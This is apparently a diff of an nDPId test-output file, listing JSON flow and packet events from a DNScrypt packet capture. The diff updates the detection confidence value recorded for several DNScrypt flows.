00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":946739304788,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":946739304788,"pkt":"ZmZmZmZmRERERERECABFAADSRcYAADIREz0pT0UNCgAAAQG7qlkAvgzwBsCBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAJ0egRkMHduA2JpegAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAA1OqoPAErbOR3M17\/\/Kp81C0M1irw8YLMFAcPIvcR6xyplTIczMGQTrzWWN9IPA9l2Zy1iwuUTL7se0EmV4wWC0NhfmNsLEH2LkBE84etohseSn740G5SsmjVFMMQ1O1aQ2F+Y2wsQfZfU52hX1OdoV9U7yE="} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":45767,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":946739304789,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739304789,"pkt":"REREREREZmZmZmZmCABFAAIc6z5AAL0RYcwKAAABMw96+rLHAbsCCHDfxkkBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxzY2FsZXdheS1hbXMAABAAAQAAAAAAAAAAAAHHAAwBwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":45767,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":45767,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38867,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":946739304789,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739304789,"pkt":"REREREREZmZmZmZmCABFAAXc6z8gAL0RfgsKAAABMw96+pfTAbsGBFECxkYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxzY2FsZXdheS1hbXMAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38867,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38867,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":84,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739304789} 00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":84,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739304789,"pkt":"REREREREZmZmZmZmCABFAABQ6z8Aub0Rot4KAAABMw96+gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":59709,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":946739304789,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739304789,"pkt":"REREREREZmZmZmZmCABFAAXc60AgAL0RfgoKAAABMw96+uk9AbsGBP+VxkgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxzY2FsZXdheS1hbXMAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":59709,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":59709,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":86,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739304789} 00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":86,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739304789,"pkt":"REREREREZmZmZmZmCABFAABQ60AAub0Rot0KAAABMw96+gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":36668,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":946739304789,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739304789,"pkt":"REREREREZmZmZmZmCABFAAIc60FAAL0RYckKAAABMw96+o88AbsCCHDfxkcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxzY2FsZXdheS1hbXMAABAAAQAAAAAAAAAAAAHHAAwBwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":36668,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":36668,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":39007,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":946739304789,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739304789,"pkt":"REREREREZmZmZmZmCABFAAXc60IgAL0RfggKAAABMw96+phfAbsGBFB4xkQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxzY2FsZXdheS1hbXMAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":39007,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 